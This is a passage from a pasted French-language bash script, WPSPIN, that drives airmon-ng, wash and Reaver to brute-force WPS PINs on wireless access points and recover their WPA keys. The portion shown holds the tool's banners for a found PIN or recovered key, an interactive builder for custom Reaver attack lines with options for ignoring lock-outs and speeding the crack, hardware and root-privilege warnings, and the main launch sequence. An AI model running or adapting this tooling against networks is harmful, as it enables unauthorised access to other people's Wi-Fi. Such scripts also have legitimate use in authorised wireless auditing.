  4605. DISPLAYNAME=$( echo "$DISPLAYNEWNAME1 $colorbase|")
  4606. echo -e " $colorabse "  
  4607. echo "+------------------------------------------------------------------------------+"
  4608. echo -e "|          $verdefluo VOUS AVEZ TROUVE LE PIN WPS  !       $colorbase le pin est $amarillo$PIN   $colorbase       |"
  4609. echo "+------------------------------------------------------------------------------+"
  4610. echo "|    la session *.wpc est sauvegardée dans votre dossier WPSPN et s'appelle    |"
  4611. echo -e "|       $azulfluo$DISPLAYNAME"
  4612. echo "+------------------------------------------------------------------------------+"
  4613.  
  4614. cat "$DIRECTORY/$WPCNAME" >> "$NEWNAME$WPCNAME"
  4615.  
  4616. rm -r "$DIRECTORY/$WPCNAME"
  4617.  
  4618. }
  4619.  
  4620.  
  4621.  
  4622. FAILEDREAVER()
  4623. {
  4624. echo "+------------------------------------------------------------------------------+"
  4625. echo -e "$rojo                                  ERREUR $colorbase
  4626. +------------------------------------------------------------------------------+
  4627. $blanco                       Reaver n'a pas pu lancer l'interface$amarillo $MON_ATTACK$blanco
  4628.  
  4629.  - Vérifiez vôtre$amarillo bouton wireless$blanco
  4630.  - Vérifiez vos$amarillo ports et connexions USB$blanco
  4631.  -$amarillo Déconnectez$blanco vous d'Internet
  4632.  
  4633. ... De retour dans le menu de$kindofviolet sélection de l'interface
  4634.       $blanco pendant que WPSPIN$verde cherche une solution
  4635. $colorbase"
  4636. sleep 5
  4637. if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  4638.     then
  4639. echo "--------------------------------------------------------------------------------"
  4640. echo -e " $rojo                      RF-Kill bloque le dispositif
  4641.  
  4642. $verdefluo Vérifiez que votre wireless soit activé et vérifiez votre interrupteur wireless $colorbase"
  4643. echo "--------------------------------------------------------------------------------"
  4644.   sleep 5
  4645.   fi
  4646.   unset MON_ATTACK
  4647.   IFACE
  4648.   BIG_MENUE
  4649. }
  4650.  
  4651.  
  4652.  
  4653.  
  4654. FAKEM4WARNING()
  4655. {
  4656. echo -e "$colorbase"
  4657. echo "+------------------------------------------------------------------------------+"
  4658. echo -e "|                   $rojo           M4 SUSPECT DÉTECTÉ   $colorbase                           |"
  4659. echo "+------------------------------------------------------------------------------+"
  4660. echo -e "|$blanco Reaver peut passer au PIN suivant alors que le précédant n'a pas été vérifié$colorbase |"
  4661. echo -e "|$blanco la clef n'est alors pas récupérée, dans ce cas effacez $amarillo$WPCNAME$colorbase |"
  4662. echo -e "|$blanco et renommez $amarillo BACKUPfakeM4_$WPCNAME$blanco comme$verdefluo $WPCNAME$colorbase  |"
  4663. echo -e "|$blanco              Vous reviendrez au niveau du premier$rojo M4 suspect$colorbase                 |"
  4664. echo "+------------------------------------------------------------------------------+"
  4665. echo -e "$colorbase"
  4666. }
  4667.  
  4668.  
  4669. FAKEM6WARNING()
  4670. {
  4671. echo -e "$colorbase"
  4672. echo "+------------------------------------------------------------------------------+"
  4673. echo -e "|                   $rojo           M6 SUSPECT DÉTECTÉ   $colorbase                           |"
  4674. echo "+------------------------------------------------------------------------------+"
  4675. echo -e "|$blanco Reaver peut passer au PIN suivant alors que le précédant n'a pas été vérifié$colorbase |"
  4676. echo -e "|$blanco la clef n'est alors pas récupérée, dans ce cas effacez $amarillo$WPCNAME$colorbase |"
  4677. echo -e "|$blanco et renommez $amarillo BACKUPfakeM6_$WPCNAME$blanco comme$verdefluo $WPCNAME$colorbase  |"
  4678. echo -e "|$blanco              Vous reviendrez au niveau du premier$rojo M6 suspect$colorbase                 |"
  4679. echo "+------------------------------------------------------------------------------+"
  4680. echo -e "$colorbase"
  4681. }
  4682.  
  4683.  
  4684.  
  4685. CUSTOMREAVER()
  4686. {
  4687. echo -e "$colorbase+------------------------------------------------------------------------------+
  4688. |                  $violet         OPTIONS DISPONIBLES          $colorbase                      |
  4689. +------------------------------------------------------------------------------+
  4690. |$amarillo -e$colorbase --essid=<ssid>    $blanco          ESSID du PA cible      $colorbase                       |
  4691. |$amarillo -c$colorbase --channel=<channel>    $blanco     fixer le canal utilisé par notre interface$colorbase    |
  4692. |                                $blanco            (implique -f)         $colorbase            |
  4693. |$amarillo -D$colorbase --daemonize   $blanco              Daemonize reaver         $colorbase                     |
  4694. |$amarillo -a$colorbase --auto       $blanco               Reaver effectue automatiquement les réglages$colorbase  |
  4695. |                                     $blanco pour mener l'attaque        $colorbase            |
  4696. |$amarillo -f$colorbase --fixed       $blanco              Pas de changement de canal (canal fixe)$colorbase       |
  4697. |$amarillo -5$colorbase --5ghz          $blanco            Utilise la bande 5GHz (A)$colorbase                     |
  4698. |$amarillo -d$colorbase --delay=<seconds>  $blanco         laps de temps entre chaque PIN ([1]par défaut)$colorbase|
  4699. |$amarillo -l$colorbase --lock-delay=<seconds> $blanco     Définir le temps d'une pause prenant lieu $colorbase    |
  4700. |     $blanco                lorsque le blocage du WPS est détecté ([60]par défaut)$colorbase   |
  4701. |$amarillo -g$colorbase --max-attempts=<num>    $blanco    Quitter reaver après un numéro de tentatives$colorbase  |
  4702. |$amarillo -x$colorbase --fail-wait=<seconds>   $blanco    Definir le temps d'une pause chaque dix   $colorbase    |
  4703. |                $blanco                        erreurs consécutives ([0] par défaut)$colorbase |
  4704. |$amarillo -r$colorbase --recurring-delay=<x:y>   $blanco  Arrêter y secondes toutes les x tentatives$colorbase    |
  4705. |$amarillo -t$colorbase --timeout=<seconds>       $blanco  Définir le timeout ([5]par défaut)        $colorbase    |
  4706. |$amarillo -T$colorbase --m57-timeout=<seconds>  $blanco   Définir le timeout entre M5 et M7 [0.20] $colorbase     |
  4707. |$amarillo -A$colorbase --no-associate       $blanco       Reaver ne s'associe pas avec l'objectif $colorbase      |
  4708. |                      $blanco (l'association sera alors mené avec un autre programme)$colorbase|
  4709. |$amarillo -N$colorbase --no-nacks       $blanco           Ne pas envoyer de NACK lorque des paquets de $colorbase |
  4710. |                                   $blanco      hors service sont reçu $colorbase              |
  4711. |$amarillo -S$colorbase --dh-small      $blanco            Clefs DH courtes pour accélérer le crack$colorbase      |
  4712. |$amarillo -L$colorbase --ignore-locks      $blanco        Ignorer l'état de blocage du WPS du PA$colorbase        |
  4713. |$amarillo -E$colorbase --eap-terminate     $blanco        Conclure chaque session WPS par un paquet$colorbase     |
  4714. |                                   $blanco           EAP FAIL               $colorbase         |
  4715. |$amarillo -n$colorbase --nack           $blanco           La cible envoie toujours un NACK [Automa]$colorbase     |
  4716. |$amarillo -w$colorbase --win7          $blanco            Imiter Windows 7  [Non activé par défaut]$colorbase     |
  4717. +------------------------------------------------------------------------------+
  4718. Les ordres en rouges sont obligatoires ($rojo reaver -i $MON_ATTACK -b $BSSID$colorbase )
  4719. Complétez  avec les arguments de vôtre choix$colorbase. Ajouttez $amarillo -c $CHANNEL$colorbase pour fixer le canal
  4720. de votre cible et $amarillo-vv$colorbase afin de voir en console les détails de l'attaque
  4721. Bonne chance :) $amarillo
  4722. "
  4723. MANDATORY=$( echo -e "$rojo reaver -i $MON_ATTACK -b $BSSID$verdefluo")
  4724. read -e -p " $MANDATORY " REAVERCOMMAND
  4725. echo -e "$colorbase"
  4726.  
  4727. until [ -z `echo $REAVERCOMMAND | tr vecDaf1234567890dlgxrtTANSLEnw - | tr -d "-" | tr -d ' '` ] ;
  4728. do
  4729.  echo -e "$rojo erreur,$blanco option non valide, vérifiez la liste au dessus"
  4730.  echo "ajoutez les arguments supplémentaires désirés ou pressez enter
  4731. "
  4732.  read -e -p " $MANDATORY " REAVERCOMMAND
  4733.  echo -e "$colorbase"
  4734. done
  4735. echo -e "$blanco Vôtre ligne d'attaque personnalisée est gardée en mémoire et sera employée lors de la prochaine attaque$colorbase
  4736. Vous pouvez attaquer avec le PIN indiqué dans le menu ($blanco 1 $colorbase) ou alors
  4737. saisisez un autre PIN ($blanco 2$colorbase ) ou bien définissez une séquence de PIN ($blanco 3 $colorbase)
  4738.  
  4739. "
  4740.  
  4741. }
  4742.  
  4743. WASHWAIT=$(echo -e "$colorbase+------------------------------------------------------------------------------+"
  4744.         echo -e "|                $verdefluo       LE SCAN AVEC WASH EST LANCÉ$colorbase                            |
  4745. +------------------------------------------------------------------------------+
  4746. |$blanco Le$amarillo PIN$blanco par défaut proposé apparait: $colorbase                                         |
  4747. |                                                                              |
  4748. |$blanco  - En$verdefluo vert$blanco si le point d'accès est supporté    $colorbase                              |
  4749. |$blanco  - En$orange orange$blanco si le point d'accès est inconnu $colorbase                                |
  4750. |$blanco  - En$rojo rouge$blanco si le point d'accès n'est pas supporté $colorbase                          |
  4751. |                                                                              |
  4752. |$azulfluo Si le BSSID est affiché en bleu$blanco la clef WPA par défaut sera générée si  $colorbase     |
  4753. |                                       $blanco       l'objectif est sélectionné      |
  4754. +------------------------------------------------------------------------------+
  4755. |         $magenta           FERMEZ LA FENÊTRE DU SCAN POUR L'ARRÊTER $colorbase                 |
  4756. +------------------------------------------------------------------------------+")
  4757.  
  4758.  
  4759.  
  4760.  
  4761.  
  4762.  
  4763. MON_ADVERTENCIA=$( echo -e "                                        
  4764.                 $rojo              ATTENTION!
  4765. $colorbase
  4766. $rojo  Le système ne détecte qu'un seul chipset et celui-ci n'est malheureusement
  4767.     pas complètement compatible, le résultat des options scan et attaque est compromis :(  
  4768. $colorbase
  4769. " )                                                                # warning the user if his chipset is not fully recognized by airmon-ng
  4770.  
  4771.  
  4772. INTERFACEDESIGN=$( echo -e "$colorbase
  4773.   NUMERO     INTERFACE        CHIPSET & DRIVER
  4774.              ---------------------------------------------------  
  4775. $blanco")    
  4776.  
  4777.  
  4778.  
  4779.  
  4780.  
  4781. NO_MONITOR_MODE=$(echo -e "$rojo          ATTENTION$colorbase :$amarillo AUCUN CHIPSET COMPATIBLE MODE MONITOR DÉTECTÉ  $colorbase
  4782.  
  4783. $rojo   WPSPIN s'exécutera en mode réduit , sans possibilité de scan ni d'attaque$colorbase
  4784. $rojo    Vous pouvez essayer de détecter à nouveau  les interfaces avec l'option 2$colorbase")
  4785.  
  4786.  
  4787.  
  4788.  
  4789. NO_REAVER=$(echo -e "$rojo             ATTENTION$colorbase :$amarillo  AUCUNE VERSION DE WPS REAVER DÉTECTÉE  $colorbase
  4790.  
  4791. $rojo  WPSPIN s'exécutera en mode réduit , sans possibilité de scan ni d'attaque$colorbase
  4792. $rojo      Vous devez installer reaver pour accéder aux autres fonctions$colorbase")
  4793.  
  4794.  
  4795.  
  4796. FAILED=$(echo -e "
  4797.                       +----------------------------------+
  4798.                       |   $blanco            Echec    $colorbase          |
  4799.                       +----------------------------------+
  4800.                       |   $rojo   CLEF WPA NON RÉCUPÉRÉE!$colorbase     |  
  4801.                       +----------------------------------+
  4802. " )
  4803.  
  4804. KEY_FOUND=$(echo -e "
  4805.                      +---------------------------------+
  4806.                      |$verdefluo       CLEF WPA RÉCUPÉRÉE! $colorbase      |
  4807.                      +---------------------------------+
  4808.             Résultats sauvegardés dans le dossier WPSPIN, voir fichier  $colorbase "
  4809.  )
  4810.  
  4811.  
  4812.  
  4813.  
  4814. STOP_REAVER=$(echo -e " $rojo                 < CTRL + C > POUR ARRÊTER L'ATTAQUE $colorbase "
  4815.  )
  4816.  
  4817.  
  4818.  
  4819.  
  4820.  
  4821. AIRMON_WARNING=$(echo -e "
  4822. $rojo                     ATTENTION!$amarillo CHIPSET NON COMPATIBLE!
  4823.  
  4824. $rojo           Le bon fonctionnement du scan et de l'attaque sont compromis    
  4825. $rojo          Il est recommandé de choisir l'option 3 (changer d'interface)$colorbase "
  4826.  )
  4827.  
  4828.  
  4829.  
  4830.  
  4831. ROOT_ADVERTENCIA=$( echo -e "                                        
  4832.                 $rojo      ATTENTION! $amarillo PAS DE PRIVILEGES ROOT
  4833. $colorbase
  4834. $rojo Vous devez avoir des droits d'administrateur pour exécuter pleinement WPSPIN
  4835.          lancez le script avec sudo ou depuis une console root$colorbase"
  4836. )                                                                                              # warning display for non root user
  4837.  
  4838.  
  4839.  
  4840.  
  4841. DIRECTORY_ADVERTENCIA=$( echo -e "                                        
  4842.                 $rojo       ATTENTION! $amarillo LOCATION INCORRECTE
  4843. $colorbase
  4844. $rojo   Vous devez être situé dans le dossier WPSPIN pour exécuter le script
  4845.   Laissez le script dans son dossier, ne changez pas le nom du dossier
  4846.                    et utilisez cd pour vous situer $colorbase"
  4847. )                                                                                              # warning display for non WPSPIN directory
  4848.  
  4849.  
  4850.  
  4851.  
  4852.  
  4853.  
  4854.  
  4855. fi
  4856.  
  4857.  
  4858.  
  4859.  
  4860.  
  4861. #################################################################################################################################################################
  4862. #####################################################THAT'S IT, ALL FUNCTIONS ARE DEFINED, NOW START THE REST OF SCRIPT##########################################
  4863. ################################################################
  4864. ##############################################################################################
  4865. #############################################           2    -   START  , the RESTART, THIS is the script
  4866. ##############################################################################
  4867.  
  4868.  
  4869.  
  4870.  
  4871.  
  4872.  
  4873.  
  4874.  
  4875. IFACE                                             #     We first invocate iface tio check the interface compoatibility
  4876. REAVER_CHECK                                      #     And if reaver is installed
  4877. BIG_MENUE
  4878. exit 0                                                  # if this two parameters arae OK than the user can acsses teh big menue, otherwise he will be limited to short menue
  4879.  
  4880.  
  4881.  
  4882. ###############################################################################################################################################
  4883. ############################################################################################
  4884. ######################################################################################################
  4885. ###############################################################################################"
  4886. #                                                END OF THE SCRIPT                                                                            #
  4887.  
  4888. #                          by kcdtv with a big help form my firends anatares_145, 1camaron1 and r00tnuLL                                      #
  4889.  
  4890. ###############################################################################################################################################
  4891.  
  4892. #     www.crack-wifi.com      www.lampiweb.com     www.auditorias wireless.net
  4893.  
  4894. ########################################################################################
  4895.  
  4896. #  GENERAL PUBLIC LICENSE VERSION 3
  4897.  
  4898. ########################################################################################################......
RAW Paste Data